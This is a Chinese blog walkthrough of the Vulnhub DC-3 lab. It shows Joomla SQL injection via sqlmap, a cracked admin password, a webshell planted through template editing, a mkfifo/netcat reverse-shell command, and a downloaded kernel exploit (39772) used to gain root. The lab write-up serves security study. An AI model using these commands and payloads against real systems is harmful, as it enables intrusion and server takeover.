首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Vulnhnb刷题-DC-3

Vulnhnb刷题-DC-3

作者头像
C3ting
发布2023-12-26 18:32:59
发布2023-12-26 18:32:59
3110
举报
文章被收录于专栏:C3tingC3ting

Vulnhnb刷题-DC-3

打开后

信息收集

通过goby查到后台框架有一个漏洞,那就直接利用进入后台

利用过程

vulhub/joomla/CVE-2017-8917 at master · vulhub/vulhub · GitHub

或者使用kali自带的搜索相关exp

直接给出sqlmap的利用的命令,复制干就完了(记得改目标IP地址)

sqlmap 查库 把管理员用户名密码拿出来

看到user表,看看有什么东西

直接复制密码去使用kali带的解密工具爆破看看

管理地址:http://192.168.119.150/administrator

管理员用户名:admin

管理员密码:snoopy

传马

登录后台后在【Extensions】->【Templates】中任意模板中发现可以编辑和新建文件,那就直接新建一个一句话木马

但是还得了解一下 joomla的目录结构要不然访问不了木马

后面应该就是接模板名称

最后得到木马地址:http://192.168.119.150/templates/beez3/ma.php

直接上蚁剑连上

反弹一个shell给kali好操作(也可以不用)

kali监听8888端口

在蚁剑执行

代码语言:javascript
复制
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.150 8888 >/tmp/f

修改交互

代码语言:javascript
复制
python3 -c 'import pty;pty.spawn("/bin/bash")'

即可反弹shell到kali

提权

尝试内核提权

查询到系统为Ubuntu 16.4的版本 内核为Linux 4.4.0

查询可用的提权漏洞

经过尝试39772的这个可用,利用过程 导出查看exp

exp下载 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

把它复制到靶机上 直接使用python3的http.server服务,靶机使用wget即可

代码语言:javascript
复制
//解压文件夹
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
//依次执行
./compile.sh
./doubleput

等待一会即可提权成功

拿下!

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Vulnhnb刷题-DC-3
    • 信息收集
    • 利用过程
    • 传马
    • 提权
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档